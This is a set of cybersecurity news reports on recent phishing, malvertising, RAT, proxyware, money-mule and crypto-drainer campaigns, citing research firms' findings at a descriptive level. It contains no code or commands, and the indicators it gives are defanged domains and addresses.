Apr 08, 2024NewsroomCybersecurity / Malvertising

A new phishing campaign has set its eyes on the Latin American region to deliver malicious payloads to Windows systems.

“The phishing email contained a ZIP file attachment that when extracted reveals an HTML file that leads to a malicious file download posing as an invoice,” Trustwave SpiderLabs researcher Karla Agregado said.

The email message, the company said, originates from an email address format that uses the domain “temporary[.]link” and has Roundcube Webmail listed as the User-Agent string.

The HTML file points containing a link (“facturasmex[.]cloud”) that displays an error message saying “this account has been suspended,” but when visited from an IP address geolocated to Mexico, loads a CAPTCHA verification page that uses Cloudflare Turnstile.

This step paves the way for a redirect to another domain from where a malicious RAR file is downloaded. The RAR archive comes with a PowerShell script that gathers system metadata as well as checks for the presence of antivirus software in the compromised machine.

It also incorporates several Base64-encoded strings that are designed to run PHP scripts to determine the user’s country and retrieve a ZIP file from Dropbox containing “many highly suspicious files.”

Trustwave said the campaign exhibits similarities with that of Horabot malware campaigns that have targeted Spanish-speaking users in Latin America in the past.

“Understandably, from the threat actors’ point of view, phishing campaigns always try different [approaches] to hide any malicious activity and avoid immediate detection,” Agregado said.

“Using newly created domains and making them accessible only in specific countries is another evasion technique. especially if the domain behaves differently depending on their target country.”

The development comes as Malwarebytes revealed a malvertising campaign targeting Microsoft Bing search users with bogus ads for NordVPN that lead to the distribution of a remote access trojan called SectopRAT (aka ArechClient) hosted on Dropbox via a phony website (“besthord-vpn[.]com”).

“Malvertising continues to show how easy it is to surreptitiously install malware under the guise of popular software downloads,” security researcher Jérôme Segura said. “Threat actors are able to roll out infrastructure quickly and easily to bypass many content filters.”

It also follows the discovery of a fake Java Access Bridge installer that serves as a conduit to deploy the open-source XMRig cryptocurrency miner, per SonicWall.

The network security company said it also discovered a Golang malware that “uses multiple geographic checks and publicly available packages to screenshot the system before installing a root certificate to the Windows registry for HTTPS communications to the [command-and-control server].”

Apr 01, 2024NewsroomBotnet / Mobile Security

Several malicious Android apps that turn mobile devices running the operating system into residential proxies (RESIPs) for other threat actors have been observed on the Google Play Store.

The findings come from HUMAN’s Satori Threat Intelligence team, which said the cluster of VPN apps came fitted with a Golang library that transformed the user’s device into a proxy node without their knowledge.

The operation has been codenamed PROXYLIB by the company. The 29 apps in question have since been removed by Google.

Residential proxies are a network of proxy servers sourced from real IP addresses provided by internet service providers (ISPs), helping users hide their actual IP addresses by routing their internet traffic through an intermediary server.

The anonymity benefits aside, they are ripe for abuse by threat actors to not only obfuscate their origins, but also to conduct a wide range of attacks.

“When a threat actor uses a residential proxy, the traffic from these attacks appears to be coming from different residential IP addresses instead of an IP of a data center or other parts of a threat actor’s infrastructure,” security researchers said. “Many threat actors purchase access to these networks to facilitate their operations.”

Some of these networks can be created by malware operators tricking unsuspecting users into installing bogus apps that essentially corral the devices into a botnet that’s then monetized for profit by selling the access to other customers.

The Android VPN apps discovered by HUMAN are designed to establish contact with a remote server, enroll the infected device to the network, and process any request from the proxy network.

Another notable aspect of these apps is that a subset of them identified between May and October 2023 incorporate a software development kit (SDK) from LumiApps, which contains the proxyware functionality. In both cases, the malicious capability is pulled off using a native Golang library.

LumiApps also offers a service that essentially permits users to upload any APK file of their choice, including legitimate applications, and bundle the SDK to it without having to create a user account, which can then be re-downloaded and shared with others.

“LumiApps helps companies gather information that is publicly available on the internet,” the Israeli company says on its website. “It uses the user’s IP address to load several web pages in the background from well-known websites.”

“This is done in a way that never interrupts the user and fully complies with GDPR/CCPA. The web pages are then sent to companies, who use them to improve their databases, offering better products, services, and pricing.”

These modified apps – called mods – are then distributed in and out of the Google Play Store. LumiApps promotes itself and the SDK as an alternative app monetization method to rendering ads.

There is evidence indicating that the threat actor behind PROXYLIB is selling access to the proxy network created by the infected devices through LumiApps and Asocks, a company that advertises itself as a seller of residential proxies.

What’s more, in an effort to bake the SDK into as many apps as possible and expand the size of the botnet, LumiApps offers cash rewards to developers based on the amount of traffic that gets routed through user devices that have installed their apps. The SDK service is also advertised on social media and black hat forums.

Recent research published by Orange Cyberdefense and Sekoia characterized residential proxies as part of a “fragmented yet interconnected ecosystem,” in which proxyware services are advertised in various ways ranging from voluntary contributions to dedicated shops and reselling channels.

“[In the case of SDKs], the proxyware is often embedded in a product or service,” the companies noted. Users may not notice that proxyware will be installed when accepting the terms of use of the main application it is embedded with. This lack of transparency leads to users sharing their Internet connection without a clear understanding.”

The development comes as the Lumen Black Lotus Labs disclosed that end-of-life (EoL) small home/small office (SOHO) routers and IoT devices are being compromised by a botnet known as TheMoon to power a criminal proxy service called Faceless.

Mar 19, 2024The Hacker NewsAPI Security / Vulnerability

Application programming interfaces (APIs) are the connective tissue behind digital modernization, helping applications and databases exchange data more effectively. The State of API Security in 2024 Report from Imperva, a Thales company, found that the majority of internet traffic (71%) in 2023 was API calls. What’s more, a typical enterprise site saw an average of 1.5 billion API calls in 2023.

The expansive volume of internet traffic that passes through APIs should be concerning for every security professional. Despite best efforts to adopt shift-left frameworks and SDLC processes, APIs are often still pushed into production before they’re cataloged, authenticated, or audited. On average, organizations have 613 API endpoints in production, but that number is rapidly expanding as pressure grows to deliver digital services to customers more quickly and efficiently. Over time, these APIs can become risky, vulnerable endpoints.

In their report, Imperva concludes that APIs are now a common attack vector for cybercriminals because they’re a direct pathway to access sensitive data. As a matter of fact, a study from the Marsh McLennan Cyber Risk Analytics Center finds that API-related security incidents cost global businesses as much as $75 billion annually.

More API Calls, More Problems

Banking and online retail reported the highest volumes of API calls compared to any other industry in 2023. Both industries rely on large API ecosystems to deliver digital services to their customers. Therefore, it’s no surprise that financial services, which include banking, were the leading target of API-related attacks in 2023.

Cybercriminals use a variety of methods to attack API endpoints, but one common attack vector is Account takeover (ATO). This attack occurs when cybercriminals exploit vulnerabilities in an API’s authentication processes to gain unauthorized access to accounts. In 2023, nearly half (45.8%) of all ATO attacks targeted API endpoints. These attempts are often carried out by automation in the form of bad bots, software agents that run automated tasks with malicious intent. When successful, these attacks can lock customers out of their accounts, provide criminals with sensitive data, contribute to revenue loss, and increase the risk of non-compliance. Considering the value of the data that banks and other financial institutions manage for their customers, ATO is a concerning business risk.

Why Mismanaged APIs are a Security Threat

Mitigating API security risk is a unique challenge that frustrates even the most sophisticated security teams. The issue stems from the fast pace of software development and the lack of mature tools and processes to help developers and security teams work more collaboratively. As a result, nearly one out of every 10 APIs is vulnerable to attack because it wasn’t deprecated correctly, isn’t monitored, or lacks sufficient authentication controls.

In their report, Imperva identified three common types of mismanaged API endpoints that create security risks for organizations: shadow, deprecated, and unauthenticated APIs.

• Shadow APIs: Also known as undocumented or undiscovered APIs, these are APIs that are unsupervised, forgotten about, and/or outside of the security team’s visibility. Imperva estimates that shadow APIs make up 4.7% of every organization’s collection of active APIs. These endpoints are introduced for a variety of reasons—from the purpose of software testing to use as a connector to a third-party service. Issues arise when these API endpoints are not cataloged or managed properly. Businesses should be concerned about shadow APIs because they typically have access to sensitive information, but nobody knows where they exist or what they’re connected to. A single shadow API can lead to a compliance violation and regulatory fine, or worse, a motivated cybercriminal will abuse it to access an organization’s sensitive data.

• Deprecated APIs: Deprecating an API endpoint is a natural progression in the software lifecycle. As a result, the presence of deprecated APIs is not uncommon, as software is updated at a rapid, continuous pace. In fact, Imperva estimates that deprecated APIs, on average, make up 2.6% of an organization’s collection of active APIs. When the endpoint is deprecated, services supporting such endpoints are updated and a request to the deprecated endpoint should fail. However, if services are not updated and the API isn’t removed, the endpoint becomes vulnerable because it lacks the necessary patching and software update.

• Unauthenticated APIs: Often, unauthenticated APIs are introduced as a result of misconfiguration, oversight from a rushed release process, or the relaxation of a rigid authentication process to accommodate older versions of software. These APIs make up, on average, 3.4% of an organization’s collection of active APIs. The existence of unauthenticated APIs poses a significant risk to organizations as it can expose sensitive data or functionality to unauthorized users and lead to data breaches or system manipulation.

To mitigate the various security risks introduced by mismanaged APIs, conducting regular audits to identify unmonitored or unauthenticated API endpoints is recommended. Continuous monitoring can help detect any attempts to exploit vulnerabilities associated with these endpoints. In addition, developers should regularly update and upgrade APIs to ensure that deprecated endpoints are replaced with more secure alternatives.

How to Protect Your APIs

Imperva offers several recommendations to help organizations improve their API Security posture:

1. Discover, classify, and inventory all APIs, endpoints, parameters, and payloads. Use continuous discovery to maintain an always up-to-date API inventory and disclose exposure of sensitive data.
2. Identify and protect sensitive and high-risk APIs. Perform risk assessments specifically targeting API endpoints vulnerable to Broken Authorization and Authentication as well as Excessive Data Exposure.
3. Establish a robust monitoring system for API endpoints to detect and analyze suspicious behaviors and access patterns actively.
4. Adopt an API Security approach that integrates Web Application Firewall (WAF), API Protection, Distributed Denial of Service (DDoS) prevention, and Bot Protection. A comprehensive range of mitigation options offers flexibility and advanced protection against increasingly sophisticated API threats—such as business logic attacks, which are particularly challenging to defend against as they are unique to each API.

Mar 13, 2024NewsroomPhishing Attack / Threat Intelligence

A new phishing campaign has been observed delivering remote access trojans (RAT) such as VCURMS and STRRAT by means of a malicious Java-based downloader.

“The attackers stored malware on public services like Amazon Web Services (AWS) and GitHub, employing a commercial protector to avoid detection of the malware,” Fortinet FortiGuard Labs researcher Yurren Wan said.

An unusual aspect of the campaign is VCURMS’ use of a Proton Mail email address (“sacriliage@proton[.]me”) for communicating with a command-and-control (C2) server.

The attack chain commences with a phishing email that urges recipients to click on a button to verify payment information, resulting in the download of a malicious JAR file (“Payment-Advice.jar”) hosted on AWS.

Executing the JAR file leads to the retrieval of two more JAR files, which are then run separately to launch the twin trojans.

Besides sending an email with the message “Hey master, I am online” to the actor-controlled address, VCURMS RAT periodically checks the mailbox for emails with specific subject lines to extract the command to be executed from the body of the missive.

This includes running arbitrary commands using cmd.exe, gathering system information, searching and uploading files of interest, and downloading additional information stealer and keylogger modules from the same AWS endpoint.

The information stealer comes fitted with capabilities to siphon sensitive data from apps like Discord and Steam, credentials, cookies, and auto-fill data from various web browsers, screenshots, and extensive hardware and network information about the compromised hosts.

VCURMS is said to share similarities with another Java-based infostealer codenamed Rude Stealer, which emerged in the wild late last year. STRRAT, on the other hand, has been detected in the wild since at least 2020, often propagated in the form of fraudulent JAR files.

“STRRAT is a RAT built using Java, which has a wide range of capabilities, such as serving as a keylogger and extracting credentials from browsers and applications,” Wan noted.

The disclosure comes as Darktrace revealed a novel phishing campaign that’s taking advantage of automated emails sent from the Dropbox cloud storage service via “no-reply@dropbox[.]com” to propagate a bogus link mimicking the Microsoft 365 login page.

“The email itself contained a link that would lead a user to a PDF file hosted on Dropbox, that was seemingly named after a partner of the organization,” the company said. “the PDF file contained a suspicious link to a domain that had never previously been seen on the customer’s environment, ‘mmv-security[.]top.'”

Mar 05, 2024NewsroomCybercrime / Malware

A new DNS threat actor dubbed Savvy Seahorse is leveraging sophisticated techniques to entice targets into fake investment platforms and steal funds.

“Savvy Seahorse is a DNS threat actor who convinces victims to create accounts on fake investment platforms, make deposits to a personal account, and then transfers those deposits to a bank in Russia,” Infoblox said in a report published last week.

Targets of the campaigns include Russian, Polish, Italian, German, Czech, Turkish, French, Spanish, and English speakers, indicating that the threat actors are casting a wide net in their attacks.

Users are lured via ads on social media platforms like Facebook, while also tricking them into parting with their personal information in return for alleged high-return investment opportunities through fake ChatGPT and WhatsApp bots.

The financial scam campaigns are notable for using DNS canonical name (CNAME) records to create a traffic distribution system (TDS), thereby allowing threat actors to evade detection since at least August 2021.

A CNAME record is used to map a domain or subdomain to another domain (i.e., an alias) instead of pointing to an IP address. One advantage with this approach is that when the IP address of the host changes, only the DNS A record for the root domain needs to be updated.

Savvy Seahorse leverages this technique to its advantage by registering several short-lived subdomains that share a CNAME record (and thus an IP address). These specific subdomains are created using a domain generation algorithm (DGA) and are associated with the primary campaign domain.

The ever-changing nature of the domains and IP addresses also makes the infrastructure resistant to takedown efforts, allowing the threat actors to continuously create new domains or alter their CNAME records to a different IP address as their phishing sites are disrupted.

While threat actors like VexTrio have used DNS as a TDS, the discovery marks the first time CNAME records have been used for such purposes.

Victims who end up clicking the links embedded on Facebook ads are urged to provide their names, email addresses, and phone numbers, after which they are redirected to the bogus trading platform for adding funds to their wallets.

“An important detail to note is the actor validates the user’s information to exclude traffic from a predefined list of countries, including Ukraine, India, Fiji, Tonga, Zambia, Afghanistan, and Moldova, although their reasoning for choosing these specific countries is unclear,” Infoblox noted.

The development comes as Guardio Labs revealed that thousands of domains belonging to legitimate brands and institutions have been hijacked using a technique called CNAME takeover to propagate spam campaigns.

Cybercriminals are using a network of hired money mules in India using an Android-based application to orchestrate a massive money laundering scheme.

The malicious application, called XHelper, is a “key tool for onboarding and managing these money mules,” CloudSEK researchers Sparsh Kulshrestha, Abhishek Mathew, and Santripti Bhujel said in a report.

Details about the scam first emerged in late October 2023, when Chinese cyber criminals were found to take advantage of the fact that Indian Unified Payments Interface (UPI) service providers operate without coverage under the Prevention of Money Laundering Act (PMLA) to initiate illegal transactions under the guise of offering an instant loan.

The ill-gotten proceeds from the operation are transferred to other accounts belonging to hired mules, who are recruited from Telegram in return for commissions ranging from 1-2% of the total transaction amounts.

“Central to this operation are Chinese payment gateways exploiting the QR code feature of UPI with precision,” the cybersecurity company noted at the time.

“The scheme leveraged a network exceeding hundreds of thousands of compromised ‘money mule’ accounts to funnel illicit funds through fraudulent payment channels, ultimately transferring them back to China.”

These mules are efficiently managed using XHelper, which also facilitates the technology behind fake payment gateways used in pig butchering and other scams. The app is distributed via websites masquerading as legitimate businesses under the guise of “Money Transfer Business.”

The app further offers the capability for mules to track their earnings and streamline the whole process of payouts and collection. This involves an initial setup process where they are asked to register their unique UPI IDs in a particular format and configure online banking credentials.

While payouts mandate the swift transfer of funds to pre-designated accounts within 10 minutes, collection orders are more passive in nature, with the registered accounts receiving incoming funds from other scammers utilizing the platform.

“Money mules activate order intake within the XHelper app, enabling them to receive and fulfill money laundering tasks,” the researchers said. “The system automatically assigns orders, potentially based on predetermined criteria or mule profiles.”

Once an illicit fund transfer is executed using the linked bank account, mules are also expected to upload proof of the transaction in the form of screenshots, which are then validated in exchange for financial rewards, thereby incentivizing continued participation.

XHelper’s features also extend to inviting others to join as agents, who are in charge of recruiting the mules. It manifests as a referral system that allows them to get bonuses for each new recruit, thus driving an ever-expanding network of agents and mules.

“This referral system follows a pyramid-like structure, fueling mass recruitment of both agents and money mules, amplifying the reach of illicit activities,” the researchers said. “Agents, in turn, recruit more mules and invite additional agents, perpetuating the growth of this interconnected network.”

Another of XHelper’s notable functions is to help train mules to efficiently launder stolen funds using a Learning Management System (LMS) that offers tutorials on opening fake corporate bank accounts (which have higher transaction limits), the different workflows, and ways to earn more commission.

Besides favoring the UPI feature built into legitimate banking apps for conducting the transfers, the platform acts as a hub for finding ways to get around account freezes to enable mules to continue their illegal activities. They are also given training to handle customer support calls made by banks for verifying suspicious transactions.

“While XHelper serves as a concerning example, it’s crucial to recognize this isn’t an isolated incident,” CloudSEK said, adding it discovered a “growing ecosystem of similar applications facilitating money laundering across various scams.”

In December 2023, Europol announced that 1,013 individuals were arrested in the second half of 2023 as part of a global effort to tackle money laundering. The international law enforcement operation also led to the identification of 10,759 money mules and 474 recruiters (aka herders).

The disclosure comes as Kaspersky revealed that malware, adware, and riskware attacks on mobile devices rose steadily from February 2023 until the end of the year.

“Android malware and riskware activity surged in 2023 after two years of relative calm, returning to early 2021 levels by the end of the year,” the Russian security vendor noted. “Adware accounted for the majority of threats detected in 2023.”

Feb 22, 2024NewsroomNetwork Security / Penetration Testing

A recently open-sourced network mapping tool called SSH-Snake has been repurposed by threat actors to conduct malicious activities.

“SSH-Snake is a self-modifying worm that leverages SSH credentials discovered on a compromised system to start spreading itself throughout the network,” Sysdig researcher Miguel Hernández said.

“The worm automatically searches through known credential locations and shell history files to determine its next move.”

SSH-Snake was first released on GitHub in early January 2024, and is described by its developer as a “powerful tool” to carry out automatic network traversal using SSH private keys discovered on systems.

In doing so, it creates a comprehensive map of a network and its dependencies, helping determine the extent to which a network can be compromised using SSH and SSH private keys starting from a particular host. It also supports resolution of domains which have multiple IPv4 addresses.

“It’s completely self-replicating and self-propagating – and completely fileless,” according to the project’s description. “In many ways, SSH-Snake is actually a worm: It replicates itself and spreads itself from one system to another as far as it can.”

Sysdig said the shell script not only facilitates lateral movement, but also provides additional stealth and flexibility than other typical SSH worms.

The cloud security company said it observed threat actors deploying SSH-Snake in real-world attacks to harvest credentials, the IP addresses of the targets, and the bash command history following the discovery of a command-and-control (C2) server hosting the data.

“The usage of SSH keys is a recommended practice that SSH-Snake tries to take advantage of in order to spread,” Hernández said. “It is smarter and more reliable which will allow threat actors to reach farther into a network once they gain a foothold.”

When reached for comment, Joshua Rogers, the developer of SSH-Snake, told The Hacker News that the tool offers legitimate system owners a way to identify weaknesses in their infrastructure before attackers do, urging companies to use SSH-Snake to “discover the attack paths that exist – and fix them.”

“It seems to be commonly believed that cyber terrorism ‘just happens’ all of a sudden to systems, which solely requires a reactive approach to security,” Rogers said. “Instead, in my experience, systems should be designed and maintained with comprehensive security measures.”

“If a cyber terrorist is able to run SSH-Snake on your infrastructure and access thousands of servers, focus should be put on the people that are in charge of the infrastructure, with a goal of revitalizing the infrastructure such that the compromise of a single host can’t be replicated across thousands of others.”

Rogers also called attention to the “negligent operations” by companies that design and implement insecure infrastructure, which can be easily taken over by a simple shell script.

“If systems were designed and maintained in a sane manner and system owners/companies actually cared about security, the fallout from such a script being executed would be minimized – as well as if the actions taken by SSH-Snake were manually performed by an attacker,” Rogers added.

“Instead of reading privacy policies and performing data entry, security teams of companies worried about this type of script taking over their entire infrastructure should be performing total re-architecture of their systems by trained security specialists – not those that created the architecture in the first place.”

The disclosure comes as Aqua uncovered a new botnet campaign named Lucifer that exploits misconfigurations and existing flaws in Apache Hadoop and Apache Druid to corral them into a network for mining cryptocurrency and staging distributed denial-of-service (DDoS) attacks.

The hybrid cryptojacking malware was first documented by Palo Alto Networks Unit 42 in June 2020, calling attention to its ability to exploit known security flaws to compromise Windows endpoints.

As many as 3,000 distinct attacks aimed at the Apache big data stack have been detected over the past month, the cloud security firm said. This also comprises those that single out susceptible Apache Flink instances to deploy miners and rootkits.

“The attacker implements the attack by exploiting existing misconfigurations and vulnerabilities in those services,” security researcher Nitzan Yaakov said.

“Apache open-source solutions are widely used by many users and contributors. Attackers may view this extensive use as an opportunity to have inexhaustible resources for implementing their attacks on them.”

Jan 08, 2024NewsroomMalware / Cybercrime

Threat actors operating under the name Anonymous Arabic have released a remote access trojan (RAT) called Silver RAT that’s equipped to bypass security software and stealthily launch hidden applications.

“The developers operate on multiple hacker forums and social media platforms, showcasing an active and sophisticated presence,” cybersecurity firm Cyfirma said in a report published last week.

The actors, assessed to be of Syrian origin and linked to the development of another RAT known as S500 RAT, also run a Telegram channel offering various services such as the distribution of cracked RATs, leaked databases, carding activities, and the sale of Facebook and X (formerly Twitter) bots.

The social media bots are then utilized by other cyber criminals to promote various illicit services by automatically engaging with and commenting on user content.

In-the-wild detections of Silver RAT v1.0 were first observed in November 2023, although the threat actor’s plans to release the trojan were first made official a year before. It was cracked and leaked on Telegram around October 2023.

The C#-based malware boasts of a wide range of features to connect to a command-and-control (C2) server, log keystrokes, destroy system restore points, and even encrypt data using ransomware. There are also indications that an Android version is in the works.

“While generating a payload using Silver RAT’s builder, threat actors can select various options with a payload size up to a maximum of 50kb,” the company noted. “Once connected, the victim appears on the attacker-controlled Silver RAT panel, which displays the logs from the victim based on the functionalities chosen.”

An interesting evasion feature built into Silver RAT is its ability to delay the execution of the payload by a specific time as well as covertly launch apps and take control of the compromised host.

Further analysis of the malware author’s online footprint shows that one of the members of the group is likely in their mid-20s and based in Damascus.

“The developer […] appears supportive of Palestine based on their Telegram posts, and members associated with this group are active across various arenas, including social media, development platforms, underground forums, and Clearnet websites, suggesting their involvement in distributing various malware,” Cyfirma said.

Dec 30, 2023NewsroomCryptocurrency / Phishing Scam

Cybersecurity researchers are warning about an increase in phishing attacks that are capable of draining cryptocurrency wallets.

“These threats are unique in their approach, targeting a wide range of blockchain networks, from Ethereum and Binance Smart Chain to Polygon, Avalanche, and almost 20 other networks by using a crypto wallet-draining technique,” Check Point researchers Oded Vanunu, Dikla Barda, and Roman Zaikin said.

A prominent contributor to this troubling trend is a notorious phishing group called Angel Drainer, which advertises a “scam-as-a-service” offering by charging a percentage of the stolen amount, typically 20% or 30%, from its collaborators in return for providing wallet-draining scripts and other services.

In late November 2023, a similar wallet-draining service known as Inferno Drainer announced that it was shutting down its operations for good after helping scammers plunder over $70 million worth of crypto from 103,676 victims since its launch in late 2022.

Web3 anti-scam solution provider Scam Sniffer, in May 2023, described the vendor as specializing in multi-chain scams and charging 20% of the stolen assets.

“It has been a long ride with all of you and we’d like to thank you from heart [sic],” the actor said in a message posted on its Telegram channel.

“A big thanks to everyone who has worked with us such as Drakan and every other customer, we hope you can remember us as the best drainer that has ever existed and that we succeeded in helping you in the quest of making money.”

At the crux of these services is a crypto-draining kit that’s crafted to facilitate cyber theft by illegally transferring cryptocurrency from victims’ wallets without their consent.

This is typically accomplished via airdrop or phishing scams, tricking targets into connecting their wallets on counterfeit websites that are propagated via malvertising schemes or unsolicited emails and messages on social media.

Earlier this month, Scam Sniffer detailed a phishing scam in which bogus ads for cryptocurrency platforms on Google and X (formerly Twitter) redirected users to sketchy sites that drained funds from users’ digital wallets.

“The user is induced to interact with a malicious smart contract under the guise of claiming the airdrop, which stealthily increases the attacker’s allowance through functions like approve or permit,” Check Point noted.

“Unknowingly, the user grants the attacker access to their funds, enabling token theft without further user interaction. Attackers then use methods like mixers or multiple transfers to obscure their tracks and liquidate the stolen assets.”

To mitigate the risks posed by such scams, users are recommended to employ hardware wallets for enhanced security, verify the legitimacy of smart contracts, and periodically review wallet allowances for signs of any suspicious activity.